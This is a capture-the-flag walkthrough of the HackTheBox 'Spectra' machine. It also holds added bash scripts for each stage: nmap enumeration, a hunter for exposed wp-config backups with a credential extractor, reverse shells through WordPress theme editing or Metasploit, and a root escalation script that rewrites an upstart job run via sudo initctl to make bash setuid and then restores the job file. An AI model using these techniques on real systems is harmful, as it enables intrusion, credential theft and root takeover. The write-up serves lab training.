Before we start, make sure you have connected to the HackTheBox network via OpenVPN.
NMAP
First of all, let’s start with an Nmap scan to identify the list of services running on the system.
We see that there are 3 ports open:
22/tcp - SSH
80/tcp - HTTP
3306/tcp - MySQL
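The scan as a script, added here as an example and not taken from the original write-up: a full-port sweep first, then default scripts and version detection on only the ports that came back open, with a helper that pulls the open ports out of nmap's grepable (-oG) output. The target IP is the box's; the sample grepable line is constructed for the example and its version strings are made up.

```shell
#!/usr/bin/env bash
# Added example: enumerate Spectra with nmap and parse the grepable output.
TARGET=10.10.10.229

# Print "port/proto service" for every open port in -oG output read from stdin.
# -oG "Host:" lines are tab-separated: "Host: ...", "Ports: ...", "Ignored State: ...";
# each port entry is port/state/proto/owner/service/rpc/version/.
open_ports() {
    awk -F'\t' '/^Host:.*Ports:/ {
        sub(/^Ports: /, "", $2)
        n = split($2, p, /, */)
        for (i = 1; i <= n; i++) {
            m = split(p[i], f, "/")
            if (f[2] == "open") print f[1] "/" f[3] " " f[5]
        }
    }'
}

# Full TCP sweep, then -sC -sV on just the open ports. $1 is an output prefix.
scan() {
    nmap -p- --min-rate 1000 -oG "$1.allports.gnmap" "$TARGET" >/dev/null
    ports=$(open_ports < "$1.allports.gnmap" | cut -d/ -f1 | paste -sd, -)
    nmap -sC -sV -p "$ports" -oA "$1.detail" "$TARGET"
}

# Constructed sample of what the -oG Host line looks like for this box (versions invented).
SAMPLE_GNMAP=$(printf 'Host: 10.10.10.229 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.6 (protocol 2.0)/, 80/open/tcp//http//nginx 1.17.4/, 3306/open/tcp//mysql//MySQL (unauthorized)/\tIgnored State: closed (65532)')

# Run "./scan.sh run spectra" against the live box; otherwise just show the parser.
if [ "${1:-}" = run ]; then
    scan "${2:-spectra}"
else
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports   # 22/tcp ssh, 80/tcp http, 3306/tcp mysql
fi
```

Parsing the grepable output rather than eyeballing the normal output means the port list for the second, slower scan is built automatically and nothing that was open gets missed.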
Web Server
There is a web server on port 80. Before exploring the web application, add the machine's IP and the spectra.htb hostname to /etc/hosts:
10.10.10.229 spectra.htb
The landing page has 2 different links. One of them takes us to a simple WordPress site under /main called “Software Issue Management”. At first glance we see a potential username, ‘administrator’. It may come in handy if we find a password.
The other link (http://spectra.htb/testing) exposes many files. It is probably a backup copy of the WordPress site.
After exploring these files, I found a juicy one. Let’s download it and look at the content.
http://spectra.htb/testing/wp-config.php.save
The wp-config.php.save file contains the database credentials. Earlier we found a potential username, ‘administrator’. If the owner of this site tends to reuse passwords, we can make use of that: let’s try the database password with that username to log in to WordPress.
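A small script for this step, added as an example and not the author's code: it probes the /testing copy for common leftover variants of wp-config.php (editor backups, rotated copies, swap files) and pulls the DB_* defines out of whatever it finds. The base URL is the one from the write-up; the suffix list and the sample wp-config contents, values included, are constructed for the example and are not the box's real credentials.

```shell
#!/usr/bin/env bash
# Added example: hunt for exposed wp-config backups and extract the DB credentials.
BASE="http://spectra.htb/testing"

# Common leftover names for a file; "wp-config.php.save" is the one this box exposes.
backup_candidates() {
    f=$1
    for s in .save .bak .old .orig .swp .txt '~'; do printf '%s%s\n' "$f" "$s"; done
    printf '.%s.swp\n%s.1\n' "$f" "$f"   # vim swap as a dotfile, logrotate-style copy
}

# Request each candidate and print the URLs that answer 200.
hunt_backups() {
    backup_candidates "$1" | while read -r name; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$BASE/$name")
        if [ "$code" = 200 ]; then echo "$BASE/$name"; fi
    done
}

# Print NAME=value for every define('DB_*', '...') in wp-config contents on stdin.
wp_config_creds() {
    sed -n "s/^[[:space:]]*define([[:space:]]*'\(DB_[A-Z]*\)',[[:space:]]*'\([^']*\)'[[:space:]]*);.*/\1=\2/p"
}

# Constructed sample (placeholder values, not the box's real config).
SAMPLE_WPCONFIG="define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'ExamplePass123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );"

# "./hunt.sh run" probes the live target; otherwise demonstrate the parser offline.
if [ "${1:-}" = run ]; then
    hunt_backups wp-config.php | while read -r url; do
        echo "== $url"; curl -s "$url" | wp_config_creds
    done
else
    printf '%s\n' "$SAMPLE_WPCONFIG" | wp_config_creds   # DB_NAME=wordpress, DB_USER=wpuser, ...
fi
```

The same suffix list is worth running against any file a web root is known to contain (wp-config.php, .env, config.php), since editor and deployment tooling leave these copies behind far more often than the original ever gets listed.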
Credentials
Yes! It worked. We are now logged in.
From here we can either use Metasploit to get a reverse shell or manually edit one of the theme’s PHP files to get one. I always prefer the manual way over an automated one, but for the sake of this write-up I will show both.
Metasploit way
Let’s search Metasploit for a WordPress admin shell upload module.
We need to set the password, username, RHOST, RPORT, TARGETURI, LHOST and LPORT:
RHOST - IP address of the target machine (the option is called RHOSTS in current Metasploit versions)
RPORT - port of the target web server (in this case port 80)
TARGETURI - path of the WordPress install on the target (in this case /main)
LHOST - IP address of your machine (check it with ifconfig)
LPORT - the port your handler listens on
Everything is ready, let’s run!
Running the ‘shell’ command inside Meterpreter drops us from the Meterpreter session into a plain system shell on the target.
Manual way
We need to replace the code of one of the theme’s PHP files with a PHP reverse shell. The theme editor lets us edit 404.php of the Twenty Nineteen theme:
http://spectra.htb/main/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen
You can download the PHP reverse shell from here.
Don’t forget to change the default IP address and port in the reverse shell to your own. Saving the file gives us a success message. Before triggering the code, start a listener on the port you specified:
nc -lvnp 1234
Visiting this link will give us a reverse shell.
http://spectra.htb/main/wp-content/themes/twentynineteen/404.php
This shell is not a proper TTY; to upgrade it, spawn a pty with python3:
python3 -c "import pty; pty.spawn('/bin/bash')"
You can learn more about upgrading Simple Shells to Fully Interactive TTYs here.
User flag
Checking /home, we see that there are 5 users on this system.
There is a user.txt in katie's home directory, but we don’t have permission to read it, so we need a way to escalate to that user.
Let’s explore more!
Before running any automated scripts (linpeas, linenum), I always check the crontabs and the ‘/opt’ and ‘/tmp’ directories.
There is an interesting file called ‘autologin.conf.orig’ in /opt.
The code implies that there is a password file under /etc/autologin. Let’s check that out.
Aye! There is actually a password. It might be the credential for the ‘katie’ user.
SSHing in as katie with that password works, and we can now read the user flag.
Root flag
Now we have to work towards the root user (vertical privilege escalation). Let’s run ‘sudo -l’ to see whether we can run anything as root.
We can run the ‘/sbin/initctl’ binary (the upstart init control tool) as root without a password.
initctl manages the jobs defined in /etc/init, and there are many job files there; we only need to check the ones that look suspicious.
These test files might include something juicy. Let’s read the content.
‘test.conf’ is an upstart job whose script section runs a node.js test. We can also edit that file because we are in the ‘developers’ group. So we can stop the ‘test’ job, add a reverse shell to the script, or simply add a ‘chmod +s /bin/bash’ command so that bash becomes setuid root, and start the job again: because the job runs as root, our added command runs as root. Note that a setuid bash drops its privileges unless you run it with the ‘-p’ flag.
sudo /sbin/initctl stop test
sudo /sbin/initctl start test
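The steps above as one script, added as an example rather than the write-up's own commands. It assumes the job file is /etc/init/test.conf (upstart's job directory) and that the sudo rule is the NOPASSWD /sbin/initctl entry from ‘sudo -l’; the stanzas in the replacement job are my own, not the contents of the original test.conf, and the original file is backed up and restored once the job has run.

```shell
#!/usr/bin/env bash
# Added example: root via a group-writable upstart job that sudo lets us restart.
JOB=test
JOB_FILE=/etc/init/$JOB.conf   # assumed location of the 'test' job

# Replacement job: the script stanza runs as root when the job starts, so it can
# make /bin/bash setuid-root. bash only keeps euid 0 if started with -p.
job_payload() {
    cat <<'EOF'
description "test job replaced for privilege escalation"
start on runlevel [2345]
stop on runlevel [016]
script
    chmod u+s /bin/bash
end script
EOF
}

# Sanity checks before touching anything: can we write the job and restart it?
preflight() {
    [ -w "$JOB_FILE" ] || { echo "not writable: $JOB_FILE" >&2; return 1; }
    sudo -n -l /sbin/initctl >/dev/null 2>&1 || { echo "no NOPASSWD initctl" >&2; return 1; }
}

escalate() {
    preflight || return 1
    cp "$JOB_FILE" "/tmp/$JOB.conf.bak"        # keep the original to restore later
    job_payload > "$JOB_FILE"
    sudo /sbin/initctl stop "$JOB" 2>/dev/null || true   # may not be running
    sudo /sbin/initctl start "$JOB"
    cp "/tmp/$JOB.conf.bak" "$JOB_FILE"        # put the real job back
    if [ -u /bin/bash ]; then
        exec /bin/bash -p                      # -p keeps the effective UID of 0
    fi
    echo "setuid bit not set; check the job's output with 'sudo /sbin/initctl status $JOB'" >&2
    return 1
}

# "./esc.sh run" performs the escalation; otherwise just print the job we would install.
if [ "${1:-}" = run ]; then
    escalate
else
    job_payload
fi
```

Restoring test.conf matters beyond tidiness: a job file that now only runs chmod would break the service for anyone else and is an obvious indicator if the box is being monitored, whereas a setuid bash plus ‘-p’ leaves the job definition as it was.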
Now we are root!
Checking the /root folder, we find the root.txt flag.